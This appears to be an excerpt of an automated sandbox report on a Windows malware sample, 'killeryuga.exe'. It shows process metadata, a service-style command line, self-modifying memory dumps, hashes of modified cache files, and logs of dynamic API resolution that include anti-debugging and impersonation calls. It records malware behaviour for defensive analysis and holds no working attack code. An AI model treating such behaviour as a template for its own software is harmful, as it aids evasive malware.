System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
Process #19: killeryuga.exe
804 7
»
Information Value
ID #19
File Name c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe" --Service 1920 "xNymGbbmgdkaiGhxWYZyeVFnQDvBkBPf0IgumxuC" BUD0QXFD5xSxqVR1j3D3kK2hZG9mBRMc93aQdsvt
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:03:10, Reason: Child Process
Unmonitor End Time: 00:03:27, Reason: Self Terminated
Monitor Duration 00:00:17
OS Process Information
»
Information Value
PID 0x5a4
Parent PID 0x780 (c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level Medium
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 590
0x 7B8
0x 790
0x 78C
0x 464
0x 7F4
0x 454
0x 7E0
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points YARA Actions
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004068AB False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041551E False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00404045 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00414D7D False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00408F6D False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040E452 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041D8B9, 0x0040BC4A False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040AA58 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00405A42 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040943F False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00424067, 0x0041F26F, ... False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00418238, 0x0040F68F False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00402D3E, 0x00417990 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00401DB0 False
...
buffer 0x008F43B0 0x00923716 Marked Executable - 32-bit - False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00423043 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041C317 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041B267 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041E4C3 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0042CE51 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0042D244 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004281E0 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00422D24 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004207EE False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0043D44C, 0x00439A27, ... False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00429D19, 0x00438910, ... False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004400B4 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00411BE0 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00412360 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00437D77, 0x0040D690, ... False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00420C00 False
...
Modified Files
»
Filename File Size Hash Values YARA Match Actions
c:\users\5p5nrg~1\appdata\local\temp\temporary internet files\content.ie5\index.dat 32.00 KB MD5: ec386329eb6df438bfe57a573c340458
SHA1: 2a1cba6fecb1ffe38e8d6f649835c75e536f1aa4
SHA256: 65e3bb2968cfee7da74f2e619e60d44387eaa91acd34be75db9044012cc7a7ac
SSDeep: 3:qRFiJ2totWIltvl3sl5llwcugxmZhlldMBGlOnO/tld/txRt/r/i//llevRR//:qjyxEFpc5O+L1ji1IRX 		False
...
c:\users\5p5nrg~1\appdata\local\temp\cookies\index.dat 16.00 KB MD5: d7a950fefd60dbaa01df2d85fefb3862
SHA1: 15740b197555ba8e162c37a60ba655151e3bebae
SHA256: 75d0b1743f61b76a35b1fedd32378837805de58d79fa950cb6e8164bfa72073a
SSDeep: 3:qRFiJ2totWIlXllll:qjyx 		False
...
Threads
Thread 0x590
583 7
»
Category Operation Information Success Count Logfile
Module Load module_name = KERNEL32.DLL, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringA, address_out = 0x75363c5a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeZoneInformation, address_out = 0x7536465a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x7536469b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x75361410 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileA, address_out = 0x753653c6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoW, address_out = 0x75363c42 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringW, address_out = 0x75363bca True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesA, address_out = 0x7538287b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoA, address_out = 0x7537d5e5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLCID, address_out = 0x75363da5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatA, address_out = 0x7538a959 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatA, address_out = 0x7538a842 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeW, address_out = 0x75361946 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeA, address_out = 0x75388266 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFileEx, address_out = 0x753e45ef True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FatalAppExitA, address_out = 0x753e4691 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FillConsoleOutputAttribute, address_out = 0x754071e9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x75361245 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetCommMask, address_out = 0x753e7198 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TransmitCommChar, address_out = 0x753e75fe True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = PrepareTape, address_out = 0x753ed232 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x75361222 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenW, address_out = 0x75361700 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumePathNameA, address_out = 0x753ebeed True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsBadWritePtr, address_out = 0x7538d1ec True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextVolumeMountPointA, address_out = 0x753ec189 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalAlloc, address_out = 0x7536588e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnlockFileEx, address_out = 0x7538d594 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x753634b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateDirectoryExA, address_out = 0x753d9479 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedDecrement, address_out = 0x753613f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteTapemark, address_out = 0x753ed2d2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeW, address_out = 0x7536418b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetNativeSystemInfo, address_out = 0x753710b5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocale, address_out = 0x7537ce46 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalDeleteAtom, address_out = 0x7537cdad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringW, address_out = 0x753617b9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringA, address_out = 0x7538bc39 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x7536192e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleW, address_out = 0x75387aca True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleOutputCP, address_out = 0x75379b0f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleA, address_out = 0x753612fc True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetStdHandle, address_out = 0x753e454f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionAndSpinCount, address_out = 0x75361916 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x753649d7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedExchange, address_out = 0x75361462 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x753634c8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleCtrlHandler, address_out = 0x75368a09 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoW, address_out = 0x75364d40 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RaiseException, address_out = 0x753658a6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RtlUnwind, address_out = 0x7538d1c3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x7537d802 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x75361809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x7538772f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetUnhandledExceptionFilter, address_out = 0x753687c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x75364a5d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x775fe026 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x753611c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x753614c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x753610ff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x75367a10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x75361282 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStdHandle, address_out = 0x753651b3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameA, address_out = 0x753614b1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x75364950 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeEnvironmentStringsW, address_out = 0x753651cb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentStringsW, address_out = 0x753651e3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineW, address_out = 0x75365223 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetHandleCount, address_out = 0x7536cb29 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileType, address_out = 0x75363531 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoA, address_out = 0x75360e00 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x776045f5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsGetValue, address_out = 0x753611e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsAlloc, address_out = 0x753649ad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsSetValue, address_out = 0x753614fb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsFree, address_out = 0x75363587 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedIncrement, address_out = 0x75361400 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x753611a9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThreadId, address_out = 0x75361450 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThread, address_out = 0x753617ec True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapCreate, address_out = 0x75364a2d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapDestroy, address_out = 0x753635b7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x7536186e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = QueryPerformanceCounter, address_out = 0x75361725 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x7536110c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x753611f8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTimeAsFileTime, address_out = 0x75363509 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x753617d1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x7536170d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleCP, address_out = 0x75407bff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleMode, address_out = 0x75361328 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x775f22b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x775f2270 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCPInfo, address_out = 0x75365189 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetACP, address_out = 0x7536179c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetOEMCP, address_out = 0x7538d1a1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidCodePage, address_out = 0x75364493 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x75361856 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x77611f6e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapSize, address_out = 0x77603002 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetEnvironmentVariableA, address_out = 0x7536e331 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x76f50000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = IsValidSecurityDescriptor, address_out = 0x76f5b58c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetFileSecurityA, address_out = 0x76f919b8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = ImpersonateLoggedOnUser, address_out = 0x76f5c57a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = ObjectCloseAuditAlarmW, address_out = 0x76f93389 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CreatePrivateObjectSecurity, address_out = 0x76f79a12 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AreAllAccessesGranted, address_out = 0x76f930a8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetAclInformation, address_out = 0x76f5cc89 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AreAnyAccessesGranted, address_out = 0x76f930b8 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x76a80000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetMetaFileBitsEx, address_out = 0x76aa7121 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateDIBPatternBrushPt, address_out = 0x76aab6da True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetWindowExtEx, address_out = 0x76aa1ace True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetMetaFileBitsEx, address_out = 0x76aa6e71 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetDeviceCaps, address_out = 0x76a94de0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = AngleArc, address_out = 0x76ac4124 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetDCBrushColor, address_out = 0x76ac232e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = FlattenPath, address_out = 0x76ac555d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetGraphicsMode, address_out = 0x76aa138a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetDIBits, address_out = 0x76a97590 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CopyEnhMetaFileW, address_out = 0x76acd9dc True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = Chord, address_out = 0x76ac439f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = PlayMetaFile, address_out = 0x76aab2b9 True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x75bd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CLSIDFromProgID, address_out = 0x75bf503c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = OleUninitialize, address_out = 0x75beeba1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = OleSetMenuDescriptor, address_out = 0x75c2dc53 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = OleLoadFromStream, address_out = 0x75bd6143 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = OleQueryCreateFromData, address_out = 0x75c532d4 True 1
Fn
Module Load module_name = SHELL32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetPathFromIDListA, address_out = 0x75f51c24 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteW, address_out = 0x75e43c71 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetInstanceExplorer, address_out = 0x75e76399 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = Shell_NotifyIconA, address_out = 0x76078af2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = DragAcceptFiles, address_out = 0x75f51bf1 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x75470000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetWindowsHookW, address_out = 0x754c8ca2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = PostThreadMessageW, address_out = 0x75488bff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetMessageQueue, address_out = 0x7549c8e7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetSysColor, address_out = 0x75486c3c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = BroadcastSystemMessageW, address_out = 0x754cc140 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = EndPaint, address_out = 0x75491341 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = OpenDesktopA, address_out = 0x7549011a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetCapture, address_out = 0x754aed56 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MsgWaitForMultipleObjects, address_out = 0x75490b4a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefDlgProcW, address_out = 0x77634100 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DdeUnaccessData, address_out = 0x754d82f4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetClassInfoExW, address_out = 0x7548b238 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetScrollBarInfo, address_out = 0x75493ff8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharLowerA, address_out = 0x75493e75 True 1
Fn
System Get Time type = System Time, time = 2019-03-24 05:38:58 (UTC) True 1
Fn
System Get Time type = Ticks, time = 94630 True 1
Fn
System Get Time type = Performance Ctr, time = 14013587204 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x75364f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x75361252 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x75364208 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x7536359f True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77609d35 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77609d35 True 1
Fn
